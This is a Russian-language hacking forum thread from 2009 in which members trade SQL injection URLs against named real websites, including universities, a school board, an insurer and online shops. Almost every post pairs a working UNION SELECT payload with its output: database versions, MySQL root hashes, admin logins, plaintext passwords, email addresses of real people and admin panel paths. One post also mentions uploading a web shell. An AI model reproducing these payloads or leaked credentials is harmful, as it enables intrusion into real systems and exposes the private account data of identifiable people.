http://www.sahovski.com/products/ci/latest.php?id=344+union+select+1,2,3,4,5,6,concat( id,0x3a,user,0x3a,password),8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 +from+admin+limit+1,1/*

http://www.ci-outreach.org/news.php?id=16+union+select+1,2,3,concat(version() ,0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,1 3,14,15,16,17+limit+1,1

5.0.67-log:eotevents:eot-web2@hemlock.ncsa.uiuc.edu

[JavaScript]

15.02.2009, 21:47

http://vemas.com.ua/index.php?lang_id=1&menu_id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())/*
user:database:version
vs_admin@hosting02.iptelecom.net.ua:vemas:4.1.25-log

http://www.ommadawn.dk/design2.php?fkt=side&id=8+union+select+1,concat_ws(0x3a,user(),database (),version())/*&snak=
user:database:version
a0001706@groda1.djurnet.levonline.com:a0001700_inn odb1:4.0.27-standard

f1ng3r

15.02.2009, 22:31

http://www.cellulare-magazine.it/news.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version (),database(),user()),5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29--

Database Version : 5.0.51a-3ubuntu5.4
Database name : cel_mag
User name : root@localhost

хватаем админа:

http://www.cellulare-magazine.it/news.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a ,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29+from+mysql.user+ limit+0,1--

root:*BB9DD2A2E45245A1F1F7218330AD4AC2551D1498

админка:

http://www.cellulare-magazine.it/ admin/

kevmen

15.02.2009, 22:44

http://www.maer-sport.ru/news/index.php?id=-12+union+select+1,2,concat_ws(0x20203a2020,version (),user(),database()),4,5

Угадал
http://www.maer-sport.ru/news/index.php?id=-12+union+select+1,2,3,4,5+from+news

http://www.nakhla.co.il/item.php?id=42+union+select+1,2,version(),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32--

Gorev

15.02.2009, 23:15

http://www.portaldeasigurari.ro/stiriint.php?ann=2006&lunaa=-2+UNION+SELECT+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8--

Database Version: 5.0.51a-community
Database name: romasigr_portal
User name: romasigr_puser@localhost

SVAROG

15.02.2009, 23:50

http://www.huntearth.com/searchsection.php?sc=-1+union+select+version()/*&s=Fishing%20Lodge&

Database Version:4.1.22-standard

Gorev

15.02.2009, 23:51

http://www.aparaturafiscala.ro/noutate.php?id=-12+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9

Version : 4.1.22-log
Database : aparaturafiscala_db
User : aparaturafiscala@localhost

f1ng3r

15.02.2009, 23:54

http://cleanenergycouncil.org.au/news/showarticle.php?id=-1+union+select+1,concat _ws(0x3a,version(),data base(),user()),3,4,5,6,7,8,9,10,11--

Database Version : 5.0.48
Database name :cleanene_website
User name : cleanene_website@localhost

-m0rgan-

15.02.2009, 23:58

http://tristihii.ru/news-view.php?ID=-1+union+select+1,2,3,4,group_concat(concat(usernam e,0x3a,password))+from+ADM_USERS--
логины/пассы:
FIDUKOFF:lutic,SHISHKOV:lexa,ULA:shish,ADMIN:trist ihii
-----------------------------------------------------------
http://kolyada-theatre.ur.ru/history.php?ID=-1+union+select+1,2,3,concat(user_login,0x3a,user_p ass),5,6,7,8,9,10,11,12+from+kol_users--
логин/пасс:
admin:b0ac5c667f75a17da9b1ff11a1c59f6b
--------------------------------------------------------------
http://www.e30club.ru/index.php?id=-116+union+select+1,concat(login,0x3a,password),3,4 ,5,6,7+from+ds_bmwstyle_users
логин/пасс:
Newsmaker:newstyle
----------------------------------------------------------------
http://www.aquamaxservice.kiev.ua/articl.php?id=-6+union+select+1,2,3,concat(adm,0x3a,pass),5,6,7+f rom+admin--
логин/пасс:
admin:Mjuehuh379
-----------------------------------------------------------------
The End!

Gorev

16.02.2009, 00:11

http://www.graphicart.ro/graphic_art-COM-945GSE,_noul_Module_CPU_COM_Express_cu_procesorul_ Atom_N270_de_la_Intel-12+AND+ASCII(SUBSTRING((select+concat_ws(0x3a,vers ion(),database(),user())%20),26,1))=44.html

Version : 5.0.18-log
Database : graphicartro_gadb
User : graphicartro@www2.linux.ro

f1ng3r

16.02.2009, 00:18

http://www.stpsb.org/news.php?id=999999+union+select+1,2,3,concat _ws(0x3a ,version(),database(),user()),5,6,7,8,9,10,11,12--

Database Version : 5.1.22-rc
Database name : STPSB
User name : stpsb@localhost

админы и сисадмины:

http://www.stpsb.org/news.php?id=999999+union+select+1,2,3,concat _ws(0x3a,email ,password),5,6,7,8,9,10,11,12+from+users+limit+0,1--

admin@nmdesigns.com:test
ronnie.barthet@stpsb.org:galaxy777
louis.boullion@stpsb.org:f!sh1ng
john.swang@stpsb.org:leoo2419
melody.swang@stpsb.org:smudge
linda.roan@stpsb.org:leroan
aj.hankel@stpsb.org:w3badmin
danny.garner@stpsb.org:ball2162
kevin.hunt@stpsb.org:mememe
Angela.Daviston@stpsb.org:yagtdb4
joseph.rogers@stpsb.org:hailyeah

админка:

http://www.stpsb.org/ admin/

вход по e-mail

-m0rgan-

16.02.2009, 00:18

http://top.frontmen.ru/kom.php?id=-1+union+select+1,concat(login,0x3a,password),3,4,5 ,6+from+users--
-------------------------------------------------------------
The End!

zifanchuck

16.02.2009, 00:40

ТТ Финансы

ТИЦ: 200
PR: 5

Database Version: 5.0.67-log
Database name: u24363
User name: u24363@10.10.153.190

http://www.ttfinance.ru/news.php?id=-4346+union+select+concat_ws(0x3a,version(),databas e(),user())--

-----------------------------------------------------------------------------------------
Российское Исламское Наследие

ТИЦ: 90
PR: 4

Database Version: 5.0.67-log
Database name: u24570_1
User name: u24570@10.10.10.221

http://islamnasledie.ru/news.php?id=-1372+union+select+1,2,3,4,concat_ws(0x3a,version() ,database(),user()),6,7,8,9,10,11,12--

------------------------------------------------------------------------------------------

f1ng3r

16.02.2009, 02:03

http://www.26000gezichten.nl/news.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a, version(),database(),user()),6,7,8,9,10,11,13,14,1 5--

Database Version : 4.0.24_Debian-10sarge2-log
Database name : 26000gezichten
User name : 26000gezichten@localhost

sabe

16.02.2009, 08:12

Wcer.wisc.edu - pr7
https://www.wcer.wisc.edu/articleindex/index.php?cat_id=83&parent_id=-11'+union+select+versioN()%23--&req=show_articles

Unlv.edu - pr7
http://www.unlv.edu/cgiwrap/webcgi/photogallery/index.php?cat_id=-15'+union+select+unhex(hex(version())),2/*&action=images

spherics

16.02.2009, 11:39

http://falunart.wizk.it/item.php?Cid=768809777+union+select+1,2,3,concat_w s(0x3a,version(),user(),database()),5,6,7,8,9,10,1 1,12,13,14,15--&Pid=4

Database Version: 4.0.23_Debian-3ubuntu2.4-log
Database name: wizkit
User name: peter@localhost

http://falunart.wizk.it/item.php?Cid=768809777+union+select+1,2,3,concat_w s(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15+ from+mysql.user--&Pid=4

root : 5ace410270df76e6

PageRank = 6

http://www.centromultimediale.it/page.php?id=89097654+UNION+SELECT+1,2,AES_DECRYPT( AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(), 0x3a,user(),0x3a),0x71),0x71),4,5--

Database Version: 4.1.20-log
Database name: cmmweb
User name: cmmusr@mysql-cluster

Assembler

16.02.2009, 12:43

http://www.jezuici.pl/faber/think.php?what=kier&id=1%20union%20select%201,2,3,4,5,6,concat_ws(0x3a ,id,nick,pass,name),8,9%20from%20bazylika_admins-- (Админские данные)
http://www.jezuici.pl/faber/think.php?what=kier&id=1%20union%20select%201,2,3,4,5,6,table_name,8,9 %20from%20information_schema.tables-- ( Все таблицы)
http://www.jezuici.pl/bazylika/index/admin.php (Админка)

nick: pass: name
PauluSJ: 18KVL08: Administrator

Есть еще несколько админок кому нада тот думаю сам наковыряет.

-m0rgan-

16.02.2009, 15:21

Шоп...
PR:4http://linz-shopping.ru/linz-type.html?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,group_conca t(concat(login,0x3a,password)),13+from+kernel_user s--
логин/пасс:
root:roMdKE/jr382Q
pavel:pa6MMGOsPbNlE
linz:liXrWmY5KaAxI
--------------------------------------------------------
PR:2
ТИЦ:80
http://www.africasia.com/themiddleeast/me.php?ID=-1973+union+select+concat_ws(version(),user(),datab ase()),2,3,4,5,6,7,8,9--
user/version/database:
africasia@localhost4.1.20-logafricasia
----------------------------------------------------
The End!

[JavaScript]

16.02.2009, 17:30

Сайт института
http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(h ex(concat_ws(0x3a,user(),database(),version()))),5 ,6,7,8,9/*
user:database:version
Y1V0_4d31n@localhost:yivo_production:4.1.9-nt

http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(h ex(concat_ws(0x3a,user,password))),5,6,7,8,9+from+ mysql.user/*
user : password (MySQL)
root:682a23ee48abb657

http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,concat _ws(0x3a,username,password),5,6,7,8,9+from+users+l imit+0,1/*
Users:
multimerge:mm4eva
hello:password
author1:password
yivo:mm4yivo

Gorev

16.02.2009, 19:05

http://www.escorts-romania.net/en_articles.php?sid=-3+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,version(), database(),user()),7,8,9,10,11,12

Database Version: 4.1.25-Debian_mt1
Database name: db24939_escorts
User name: db24939@64.13.232.28

Assembler

16.02.2009, 19:05

http://www.incity.ac/ua/firms/insurance/alfa.php?city=-1%20union%20select%201,table_name,3,4,5,6,7%20from %20information_schema.tables-- (Таблицы)

http://www.incity.ac/ua/firms/insurance/alfa.php?city=-1%20union%20select%201,concat_ws(0x3a,adm_name,adm _login,adm_password)%20,3,4,5,6,7%20from%20insity_ adm-- (Админские данные)

adm_name,adm_login,adm_password

Andrew:incityadmin:incityadmin

Админку не нашел.. =(

faza02

16.02.2009, 19:15

http://www.summitmediapartners.com/filemgmt/singlefile.php?lid=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16--

5.0.67-community

таблицы: gl_users
колонки: username, passwd

админка: http://www.summitmediapartners.com/admin/moderation.php

Gorev

16.02.2009, 19:36

http://www.raft.ro/produs.php?idprodus=17720+UNION+SELECT+1,AES_DECRY PT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database() ,User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37+LIMIT+1,1

Database Version: 4.0.23-nt
Database name: raft
User name: raftdb@localhost

http://www.raft.ro/produs.php?idprodus=17720+UNION+SELECT+1,AES_DECRY PT(AES_ENCRYPT(CONCAT_WS(0x3a,userid,email,usernam e,password),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37+from+users+LIMIT+1,1

spherics

16.02.2009, 20:30

PageRank = 6

http://www.worldsbk.com/pubb_EN/news_ext.php?id=2580970966539+union+select+concat_ ws(0x3a,version(),user(),database())--

Database Version: 5.0.32-Debian_7etch6-log
Database name: worldsbk
User name: mysqlweb@192.168.1.73

http://www.worldsbk.com/pubb_EN/news_ext.php?id=2580970966539+union+select+concat_ ws(0x3a,user,password)+from+mysql.user--

root : *D6D90523CDBE293EFE62145B33F293D273308551

http://ww2.jhu.edu/~osi/show_group.php?inputGroup=-201+union+select+concat_ws(0x3a,version(),user(),d atabase())--

Database Version: 5.0.45
Database name: osi
User name: osi@localhost

http://ww2.jhu.edu/~osi/show_group.php?inputGroup=-201+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 3a,(SELECT+CONCAT(USERID,0x3a,USERNAME,0x3a,PASSWO RD,0x3a,TYPE,0x3a,EMAIL)+FROM+osi.USERS+LIMIT+4,1) ,0x3a),0x71),0x71)--

USERID : USERNAME : PASSWORD : TYPE : EMAIL

:1:briansuk:b0544c87bad417ec3cbbdb25ef4705c4:A:b_s uk@jhu.edu хэш MD5:b0544c87bad417ec3cbbdb25ef4705c4 : brianbrian
:6:afriant1:964e3f989bc8389d161320484dc3ef31:V:afr iant1@jhu.edu
:5:1photo2:1cd760c843449a0ecb9aa20afacbeff7:V:di7@ jhu.edu хэш MD5:1cd760c843449a0ecb9aa20afacbeff7 : 2photo3
:3:briantest:b45f850374b26692270d10fb090ad09d:V:b_ suk@hotmail.com
:2:jgroden1:c064a79ee9f78586511a548e784b5a2d:A:jgr oden1@jhu.edu хэш MD5 : c064a79ee9f78586511a548e784b5a2d : bluejays

Админка

http://ww2.jhu.edu/~osi/administrator/

Шелл льём через загрузку компонентов.Хотя на любителя.)

Savemode OFF

Gorev

16.02.2009, 20:32

http://ciupercarii.ro/index.php?section=vanzari_details&id_prod=-14+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6

Database Version: 5.0.67-community
Database name: ciuperca_ciupercarie
User name: ciuperca_ciuperc@localhost

http://ciupercarii.ro/login

admin:admin

f1ng3r

16.02.2009, 20:40

PageRang - 7

http://www.disco.bg/designs/classic2_bg.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se( ),user()),4,5,6,7,8,9,10,11 ,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71--

Database Version :5.0.67-community-log
Database name : discobg_disco
User name : discobg_site2@localhost

в таблицах нахожу клиентов:

http://www.disco.bg/designs/classic2_bg.php?id=-1+union+select+1,2,table _name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71+from+information _schema.tables+limit+31,1--

В колонах узнаю:

http://www.disco.bg/designs/classic2_bg.php?id=9999999+union+select+1,2,COLUMN _NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70 ,71+from+INFORMATION_SCHEMA.COLUMNS+PROFILING+WHER E+TABLE_NAME+ LIKE+char(112,104,112,97,100,115,95,99,108,105,101 ,110,116,115) +limit+6,1--

clientusername
clientpassword

но вот только почему-то он мне их не хочет выводить из phpads_clients :mad: ... напишите в личку если у кого получиться вывести все :p

Gorev

16.02.2009, 20:54

http://www.peruvision.ro/inc/pag/produse/produs_detalii.php?tabela=catp_1_cat_1_subcat_1&id=-8+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12/*&l=ro

Version : 5.0.18-log
databse : peruvisionro_1
User : peruvisionro@www2.linux.romtelecom.net.

Assembler

16.02.2009, 20:56

http://www.bestellauto.de/index.php?who=999+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 0,61,62,63,64,65,66,67,68,69,version(),71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96,97,98,99,100,101,102,103,104,105, 106,107,108,109,110,111,112,113,114,115,116,117,11 8,119,120,121,122,123,124,125,126,127,128,129,130, 131,132,133,134,135,136,137,138,139,140,141,142,14 3,144,145,146,147,148,149,150,151,152,153,154,155, 156,157,158,159,160,161,162,163,164,165,166,167,16 8,169,170,171,172,173,174,175,176,177,178,179,180, 181,182,183,184,185,186,187,188,189,190,191,192,19 3,194,195,196,197,198,199,200,201,202,203,204,205, 206,207,208,209,210,211,212,213,214,215,216,217,21 8,219,220,221,222,223,224,225,226,227,228,229,230, 231,232,233,234,235,236,237,238,239,240,241,242,24 3,244,245,246,247,248,249,250,251,252,253,254,255, 256,257,258,259,260,261,262,263,264,265,266,267,26 8,269,270,271,272,273,274,275,276,277,278,279,280, 281,282,283,284,285,286,287,288,289,290,291,292,29 3,294,295,296,297,298,299,300,301,302,303,304,305, 306,307,308,309,310,311,312,313,314,315,316,317,31 8,319,320,321,322,323,324,325,326,327,328,329,330, 331,332,333,334,335,336,337,338,339,340,341,342,34 3,343,345,346,347,348,349,350,351,352,353,354,355, 356,357,358,359,360,361,362,363,364,365,366,367,36 8,369,370,371,372,373,374,375,376,377,378,379,380, 381,382,383,384,385,386,387,388,389,390,391,392,39 3,394,395,396,397,398,399,400,401,402,403,404,405, 406,407,408,409,410,411,412,413,414,415,416,417,41 8,419--

4.0.24_Debian-10sarge3-log

ЫЫ я псих

-m0rgan-

16.02.2009, 21:24

Какая то онлайн игра...
www.camelotherald.com
PR:4
http://www.camelotherald.com/news/news_article.php?storyid=-1+union+select+1,2,3,convert(concat_ws(0x3a,versio n(),user(),database())+using+latin1),5,6,7,8,9,10, 11,12,13--
верия/юзер/бд:
4.1.10-standard:web@camelotherald.com:herald
--------------------------------------------------------------------
www.maryland.com
PR:6
http://www.maryland.com/articles/article.php?a_id=-99999+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34--
верия/юзер/бд:
4.0.24-standard-log:cms@localhost:cms
---------------------------------------------------------------------
www.cloudynights.com
PR:6
http://www.cloudynights.com/item.php?item_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(con cat_ws(0x3a,version(),user(),database())+using+lat in1),13,14,15,16,17,18,19,20,21,22,23--
верия/юзер/бд:
4.1.14-log:asaint_6@216.92.192.94:asaint_cloudynights
----------------------------------------------------------------------
The End!

Gorev

16.02.2009, 21:35

http://www.arb.ro/evenimente.php?id=-6+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS (0x3a,Version(),Database(),User()),0x71),0x71),3,4 ,5,6,7,8,9--%20&c=25-noiembrie-2008-/-Forum-National-SEPA

Database Version: 5.0.18-log
Database name: arbro
User name: arb2006@www2.linux.romtelecom.net.

z00MAN

16.02.2009, 22:48

Riverside hotel, hotels in Ross on Wye, Ross on Wye hotel
http://www.wiltoncourthotel.com/page.php?id=-16+union+select+1,2,3,4,5,6,concat(version(),0x3a, database(),0x3a,user()),8,9,10,11,12,13,14,15,16,1 7,18,19--

user(): wiltonnew@localhost
database(): wiltonnew
version(): 4.1.19

PR=3

есть таблица admin
http://www.wiltoncourthotel.com/page.php?id=-16+union+select+1,2,3,4,5,6,password,8,9,10,11,12, 13,14,15,16,17,18,19+from+admin--

password: admin
логин не нашёл

Astraware: Games and applications for Palm OS and Windows Mobile Smartphones and PDAs
http://www.astraware.com/support/search.php?section=-10+union+select+concat(version(),0x3a,database(),0 x3a,user())--

user(): website@localhost
database(): astraware3
version(): 4.1.21-max

PR=6

тИЦ=120

Best Hand Made Paper Product
http://thelotushmp.com/pages/product.php?id=-16+union+select+1,2,3,concat(version(),0x3a,databa se(),0x3a,user()),5,6,7,8--

user(): thelot_user@localhost
database(): thelot_lotus
version(): 4.1.22-standard

-m0rgan-

16.02.2009, 23:01

http://girlsector.com/foto_pr.php?id=-1+union+select+1,2,concat(id,0x3a,login,0x3a,pass) +from+gallery_admin+limit+0,1--
логин/пасс:
bolt:f07ad2552c86bfd4d2396c0114f785ea
---------------------------------------------------------------------------
The End!

f1ng3r

16.02.2009, 23:57

idg.bg - PR 7

http://events.idg.bg/?call=USE~events;&id=3+union+select+1,concat_ ws(0x3a,version(),database( ),user()),3,4--

Database Version : 4.1.22-log
Database name : events
User name : spiridon@localhost

админы:

http://events.idg.bg/?call=USE~events;&id=3+union+select+1,concat_ ws(0x3a ,user,password),3,4+from+ mysql.user--

root:*A3D00BFBECA25837E7D8C87895FF81D1ABB20C93
spiridon:6294f8ca11192704
webadmin2:5ae1cdf626a45787
stormdevil:*818844DA62BBAC1C12CF2F960F24FA392A543C A3
cacti:6c9dbb641fab2064

Gorev

17.02.2009, 00:14

http://www.rep3.ro/view_event.php?id=-22+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7/*

Database Version: 5.0.22-Debian_0ubuntu6.06.11-log
Database name: ds_rep3
User name: rep3@localhost

faza02

17.02.2009, 00:22

http://noc.teilam.gr/filemgmt/singlefile.php?lid=-2+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16/*

5.0.32-Debian_7etch8-log

http://noc.teilam.gr/filemgmt/singlefile.php?lid=-2+union+select+1,2,concat(passwd,username),4,5,6,7 ,8,9,10,11,12,13,14,15,16+from+gl_users/*
8b2ecafccebcd0c49f4d1189c0a283f5:Admin

http://noc.teilam.gr/admin/moderation.php
админка

f1ng3r

17.02.2009, 00:46

PR - 5

http://www.generali.bg/main/en/life_insurance_investment_fund.php?id=-1+union+select+1,concat _ws(0x3a,version( ),database(),user()),3,4,5,6,7--

Database Version : 4.1.22-standard-log
Database name : generali_site
User name : generali_general@localhost

------------------------------------------#

PR - 4

http://voob.ru/index.php?division_id=-1+union+select+1,concat_ w s(0x3a,version(),database(),user()),3,4,5,6--

Database Version : 5.0.45
Database name : wwwvoobru
User name : voob@localhost

------------------------------------------#

PR - 4

http://rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5,6,7--

Database Version : 5.0.41-log
Database name : rosstok
User name : rosstok@jet.mplik.ru

юзвери:

http://rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,concat_ ws(0x3a,id_user,nik,passw,email),4,5,6,7+from+user--

их 3029 чела ... выводятся сразу все без лимита :)

kevmen

17.02.2009, 12:28

http://www.mosmedia.com.tr/cinar/ilkogretim/icerik.php?id=65+union+select+1,2,3,table_name,5,c olumn_name,7,8,9,1+from+information_schema.columns +limit+193,1
PS: limit+193,1уже не верил что она вообще там есть)

http://www.peterkay.dk/news.php?ID=15+union+select+1,table_name,3,4,5,6,7 ,8,9,10,11,12,13+from+information_schema.tables+li mit+17,1

http://www.peterkay.dk/news.php?ID=15+union+select+1,column_name,3,4,5,6, 7,8,9,10,11,12,13+from+information_schema.columns+ where+table_name=char(97,100,109,105,110)+limit+2, 1

http://www.peterkay.dk/news.php?ID=15+union+select+1,column_name,3,4,5,6, 7,8,9,10,11,12,13+from+information_schema.columns+ where+table_name=char(97,100,109,105,110)+limit+2, 1

http://www.peterkay.dk/news.php?ID=15+union+select+1,column_name,3,4,5,6, 7,8,9,10,11,12,13+from+information_schema.columns+ where+table_name=char(97,100,109,105,110)+limit+3, 1

http://www.peterkay.dk/news.php?ID=15+union+select+1,AdminPassword,3,4,5, 6,7,8,9,10,11,12,13+from+admin
AdminUsername: peterkay
AdminPassword: peterkay

Assembler

17.02.2009, 17:13

(Все таблицы)

http://real-renta.ru/all.php?type=1%20union%20select%201,2,3,4,5,6,7,8, 9,table_name,11%20from%20information_schema.tables--

Версия 5...

Rubaka

17.02.2009, 17:54

http://www.arctic-adventure.dk/page.php?id=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6/*

z00MAN

17.02.2009, 18:37

Colocation | Broadband Wireless | Dedicated Servers | DocSTAR | DSL | Web Hosting | Web Design & Development - Infinity Internet
http://www.iinet.com/support/answer.php?id=-17'+union+select+1,2,concat(user(),0x3a,database() ,0x3a,version()),4,5,6,7,8,9,10,11/*

user(): infinityinternet@web08.pacifier.net
database(): iinetcom
version(): 4.0.25

PR=5
тИЦ=250

edichka

17.02.2009, 19:41

Посетите Кэмбридж =) Pr 6

http://visitcambridge.org

http://www.visitcambridge.org/unique.php?id=-3+union%20select%201,2,3

Database Version: 5.0.22
Database name: visitcambridge
User name: visitcambridge@localhost

Логинка : www.visitcambridge.org/cms

frankiem::::happyfeet::::frankie.mcghee@cambridge. gov.uk

Napas

17.02.2009, 21:26

www.atlantic-university.org

https://www.atlantic-university.org/home.php?CopyID=-111+union+select+1,2,3,4,5,login,pwd+from+users/*
4.1.25-Debian_mt1-log

одменка - https://www.atlantic-university.org/login/
webmaster:n0m3@+p1@

kennedy.byu.edu
http://kennedy.byu.edu/isp/print.php?id=-219'+union+select+1,2,3,4,5,cast(concat(version(), 0x2f,user())+as+binary),7,8/*
4.1.7-nt

www.clarkson.edu
http://www.clarkson.edu/news/print.php?id=-1877'+union+select+table_name,null+from+informatio n_schema.tables+where+table_name+not+in+('body','c omments','D99_Tmp','Headlines','Headlines$','News_ release','Paragraphs','Paragraphs$','Sysdiagrams', 'User12')--+
Microsoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition On Windows NT 5.2 (Build 3790: Service Pack 2)

f1ng3r

17.02.2009, 21:41

PR - 5

http://www.mountain-riders.org/_news/news.php?id=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database( ),user()),5,6,7,8,9--

Database Version : 4.0.25-standard-log
Database name : mountainriders
User name : mountainriders@10.0.63.118

не даёт она себя больше проскулить :mad:

Kraneg

17.02.2009, 22:17

uaflibrary.us - PR6
http://uaflibrary.us/onlinedatabases/ui/resource.php?id=276276%27+UNION+SELECT+1,2,3,4,5,6 ,7,concat_ws(0x3a,version(),user(),database()),9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30/*
DB_Ver:5.0.27-max-log
DB_User:rasmusonlib@localhost
DB:uafresources
5 ветка, просмотрев таблицы видим что есть еще WordPress в бд wp_rasmusondbs и табличка USERS в uafresources
зайти в вордпресс можно тут:
http://uaflibrary.us/blogs/highered/hec/wp-login.php
А вот к чему относится USERS не нашел(плохо искал наверное) =)
Вытаскиваем админа блога
http://uaflibrary.us/onlinedatabases/ui/resource.php?id=276276'+UNION+SELECT+1,2,3,4,5,6,7 ,concat_ws(0x3a,user_login,user_pass),9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30+FROM+wp_rasmusondbs.wp_users/*
admin:b29971a4ef9bd14d770bae9eefd5318d

-m0rgan-

17.02.2009, 22:18

http://www.metropolis.ur.ru/dop.php?id=-1+union+select+concat_ws(0x3a,login,password),2,3, 4+from+mtr_admin+--+
логин/пасс:
metro:370df69f54fc2368
--------------------------------------------------------
The End!

Gorev

17.02.2009, 23:44

http://www.mormota.ro/index.php?tart=101&alm=4&produs=1498+UNION+SELECT+1,2,3,concat_ws(0x3a,vers ion(),database(),user()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21--%20&cont=pscout

Database Version: 5.0.68-log
Database name: mormota
User name: mYmor@localhost

faza02

17.02.2009, 23:56

http://www.santillana.com.gt/grupo/qs.php/?id=-14+union+select+1,version(),3/*

4.1.25-Debian_mt1-log

PR: 4

Rubaka

18.02.2009, 00:11

http://www.dnkcity.dp.ua/contest/viev.php?id=82+UNION+SELECT+1,2,3,4,concat(user(), 0x3a,version()),6,7,8,9,10,11,12+LIMIT+1,1/*

есть PHPBB

Database Version: 5.0.45-log
Database name: dnkcityd_dnkcity
User name: dnkcityd@localhost

Assembler

18.02.2009, 00:29

Как вы думаете какой лучший спозоб защиты от взлома???
http://mzagzog.org/index.php?pg=say.php&pag=-1%20union%20select%201,concat_ws(0x3a,user_name,pa ss)%20from%20admin--
Сайт взломан
elassal:lookat9095 (логин пароль)
Админка
http://mzagzog.org/admin/
Логин и пароль подходят к админке... (А зайдите туды и скажите все таки какой способ защиты лучший))

18.02.2009, 05:43

Короче всё кидаю в КВОТС, чтоб не сортировать:

landhaus.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
5.0.45-log
=
www.shoptraffic.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6
4.1.22-standard (магазин)
=
www.jean-jack.com.ua/news.php?id=-3+UNION+SELECT+1,2,3
5.0.44-log
=
ceramica.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4
5.0.41-community-log
=
www.sana-med.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8
5.1.22-rc-log
9fed66b17b90086737f7718f83f2c6dd:admin (pass='a825kgg2')
fd0b92d4c80b798d554a50080e826e00:Админист� �атор
=
fit-terminal.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11
5.0.45-log
редирект на Индекс, только через сканеры скуль.
=
salve.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5
http://salve.com.ua/news.php?id=-3+UNION+SELECT+1,2,concat(user,0x3a,pass),4,5+from +user
valera:4fd7b3202a2b2997e6ab124ec039422e
5.0.51a
=
panbud.com.ua/news.php?id=-3+UNION+SELECT+1,2,3
5.0.45-log
=
crimea.activelife.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4
4.1.22
=
www.unimed.com.ua/a-news/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7,8,9
4.1.22-log
3й сайт в Гугле
=
www.foros.com.ua/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7
5.0.67-community-log
Первый по гуглу

=
www.cipa.org.ua/ukr/news/news.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7
4.1.22
=
kievrealtor.org.ua/news.php?id=-3+UNION+SELECT+1,2,3,4
4.1.22-standard
